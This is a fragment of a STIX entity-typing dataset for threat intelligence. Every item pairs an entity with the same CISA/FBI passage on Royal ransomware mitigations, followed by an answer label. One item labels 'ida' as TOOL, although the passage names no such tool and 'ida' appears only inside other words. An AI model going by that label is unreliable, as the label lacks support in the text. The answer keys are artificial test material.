"input": "### Entity:\nCISA\n\n---\n\n### Text Passage:\n**MITIGATIONS**\nThese mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems) thus strengthening the security posture for their customers.\nFor more information on secure by design, see CISA\u2019s Secure by Design webpage and joint guide.\nFBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA\u2019s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, TTPs, and yield goals that all organizations across critical infrastructure sectors should implement.\n* **Implement a recovery plan** to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] n a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) **to comply** with the National Institute for Standards and Technology\u2019s (NIST\u2019s) standards for developing and managing password policies [CPG 3.4].\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4].\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts [CPG 1.1].\n* Disable password hints.\n* Refrain from requiring password changes more frequently than once per year.\n**Note:** NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require multifactor authentication**[CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Reduce the threat of malicious actors** using remote access tools by applying mitigations in joint Guide to Securing Remote Access Software.\n* **Keep all operating systems, software, and firmware up to date.** Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\n* **Segment networks**[CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement.\n* **Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.** To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n* **Install, regularly update, and enable real time detection for antivirus software** on all hosts.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 1.5].\n* **Disable unused ports**.\n* **Consider adding an email banner to emails**[CPG 8.3] received from outside your organization.\n* **Implement time-based access for accounts set at the admin level and higher.** For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the PoLP (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the active directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n* **Disable command-line and scripting activities and permissions**. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.\n* **Maintain offline backups of data,** and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.\n* **Ensure all backup data is encrypted, immutable**(i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure [CPG 3.3].\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nida\n\n---\n\n### Text Passage:\n**MITIGATIONS**\nThese mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems) thus strengthening the security posture for their customers.\nFor more information on secure by design, see CISA\u2019s Secure by Design webpage and joint guide.\nFBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA\u2019s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, TTPs, and yield goals that all organizations across critical infrastructure sectors should implement.\n* **Implement a recovery plan** to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] n a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) **to comply** with the National Institute for Standards and Technology\u2019s (NIST\u2019s) standards for developing and managing password policies [CPG 3.4].\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4].\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts [CPG 1.1].\n* Disable password hints.\n* Refrain from requiring password changes more frequently than once per year.\n**Note:** NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require multifactor authentication**[CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Reduce the threat of malicious actors** using remote access tools by applying mitigations in joint Guide to Securing Remote Access Software.\n* **Keep all operating systems, software, and firmware up to date.** Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\n* **Segment networks**[CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement.\n* **Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.** To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n* **Install, regularly update, and enable real time detection for antivirus software** on all hosts.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 1.5].\n* **Disable unused ports**.\n* **Consider adding an email banner to emails**[CPG 8.3] received from outside your organization.\n* **Implement time-based access for accounts set at the admin level and higher.** For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the PoLP (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the active directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n* **Disable command-line and scripting activities and permissions**. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.\n* **Maintain offline backups of data,** and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.\n* **Ensure all backup data is encrypted, immutable**(i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure [CPG 3.3].\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nAvoid reusing passwords\n\n---\n\n### Text Passage:\n**MITIGATIONS**\nThese mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems) thus strengthening the security posture for their customers.\nFor more information on secure by design, see CISA\u2019s Secure by Design webpage and joint guide.\nFBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA\u2019s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, TTPs, and yield goals that all organizations across critical infrastructure sectors should implement.\n* **Implement a recovery plan** to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] n a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) **to comply** with the National Institute for Standards and Technology\u2019s (NIST\u2019s) standards for developing and managing password policies [CPG 3.4].\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4].\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts [CPG 1.1].\n* Disable password hints.\n* Refrain from requiring password changes more frequently than once per year.\n**Note:** NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require multifactor authentication**[CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Reduce the threat of malicious actors** using remote access tools by applying mitigations in joint Guide to Securing Remote Access Software.\n* **Keep all operating systems, software, and firmware up to date.** Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\n* **Segment networks**[CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement.\n* **Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.** To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n* **Install, regularly update, and enable real time detection for antivirus software** on all hosts.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 1.5].\n* **Disable unused ports**.\n* **Consider adding an email banner to emails**[CPG 8.3] received from outside your organization.\n* **Implement time-based access for accounts set at the admin level and higher.** For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the PoLP (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the active directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n* **Disable command-line and scripting activities and permissions**. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.\n* **Maintain offline backups of data,** and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.\n* **Ensure all backup data is encrypted, immutable**(i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure [CPG 3.3].\n",
"output": "COURSE_OF_ACTION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nImplement time-based access for accounts set at the admin level and higher\n\n---\n\n### Text Passage:\n**MITIGATIONS**\nThese mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems) thus strengthening the security posture for their customers.\nFor more information on secure by design, see CISA\u2019s Secure by Design webpage and joint guide.\nFBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA\u2019s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, TTPs, and yield goals that all organizations across critical infrastructure sectors should implement.\n* **Implement a recovery plan** to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] n a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) **to comply** with the National Institute for Standards and Technology\u2019s (NIST\u2019s) standards for developing and managing password policies [CPG 3.4].\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4].\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts [CPG 1.1].\n* Disable password hints.\n* Refrain from requiring password changes more frequently than once per year.\n**Note:** NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require multifactor authentication**[CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Reduce the threat of malicious actors** using remote access tools by applying mitigations in joint Guide to Securing Remote Access Software.\n* **Keep all operating systems, software, and firmware up to date.** Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\n* **Segment networks**[CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement.\n* **Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.** To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n* **Install, regularly update, and enable real time detection for antivirus software** on all hosts.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 1.5].\n* **Disable unused ports**.\n* **Consider adding an email banner to emails**[CPG 8.3] received from outside your organization.\n* **Implement time-based access for accounts set at the admin level and higher.** For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the PoLP (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the active directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n* **Disable command-line and scripting activities and permissions**. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.\n* **Maintain offline backups of data,** and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.\n* **Ensure all backup data is encrypted, immutable**(i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure [CPG 3.3].\n",
"output": "COURSE_OF_ACTION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nDisable unused ports\n\n---\n\n### Text Passage:\n**MITIGATIONS**\nThese mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems) thus strengthening the security posture for their customers.\nFor more information on secure by design, see CISA\u2019s Secure by Design webpage and joint guide.\nFBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA\u2019s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, TTPs, and yield goals that all organizations across critical infrastructure sectors should implement.\n* **Implement a recovery plan** to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] n a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) **to comply** with the National Institute for Standards and Technology\u2019s (NIST\u2019s) standards for developing and managing password policies [CPG 3.4].\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4].\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts [CPG 1.1].\n* Disable password hints.\n* Refrain from requiring password changes more frequently than once per year.\n**Note:** NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require multifactor authentication**[CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Reduce the threat of malicious actors** using remote access tools by applying mitigations in joint Guide to Securing Remote Access Software.\n* **Keep all operating systems, software, and firmware up to date.** Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\n* **Segment networks**[CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement.\n* **Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.** To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n* **Install, regularly update, and enable real time detection for antivirus software** on all hosts.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 1.5].\n* **Disable unused ports**.\n* **Consider adding an email banner to emails**[CPG 8.3] received from outside your organization.\n* **Implement time-based access for accounts set at the admin level and higher.** For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the PoLP (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the active directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n* **Disable command-line and scripting activities and permissions**. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.\n* **Maintain offline backups of data,** and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.\n* **Ensure all backup data is encrypted, immutable**(i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure [CPG 3.3].\n",
"output": "COURSE_OF_ACTION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nSegment networks\n\n---\n\n### Text Passage:\n**MITIGATIONS**\nThese mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems) thus strengthening the security posture for their customers.\nFor more information on secure by design, see CISA\u2019s Secure by Design webpage and joint guide.\nFBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA\u2019s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, TTPs, and yield goals that all organizations across critical infrastructure sectors should implement.\n* **Implement a recovery plan** to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] n a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) **to comply** with the National Institute for Standards and Technology\u2019s (NIST\u2019s) standards for developing and managing password policies [CPG 3.4].\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4].\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts [CPG 1.1].\n* Disable password hints.\n* Refrain from requiring password changes more frequently than once per year.\n**Note:** NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require multifactor authentication**[CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Reduce the threat of malicious actors** using remote access tools by applying mitigations in joint Guide to Securing Remote Access Software.\n* **Keep all operating systems, software, and firmware up to date.** Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\n* **Segment networks**[CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement.\n* **Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.** To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n* **Install, regularly update, and enable real time detection for antivirus software** on all hosts.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 1.5].\n* **Disable unused ports**.\n* **Consider adding an email banner to emails**[CPG 8.3] received from outside your organization.\n* **Implement time-based access for accounts set at the admin level and higher.** For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the PoLP (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the active directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n* **Disable command-line and scripting activities and permissions**. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.\n* **Maintain offline backups of data,** and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.\n* **Ensure all backup data is encrypted, immutable**(i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure [CPG 3.3].\n",
"output": "COURSE_OF_ACTION"
},
{
